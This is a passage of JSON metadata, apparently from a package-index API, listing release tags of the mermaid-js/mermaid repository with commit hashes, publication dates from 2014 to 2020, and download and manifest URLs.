pi/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/ma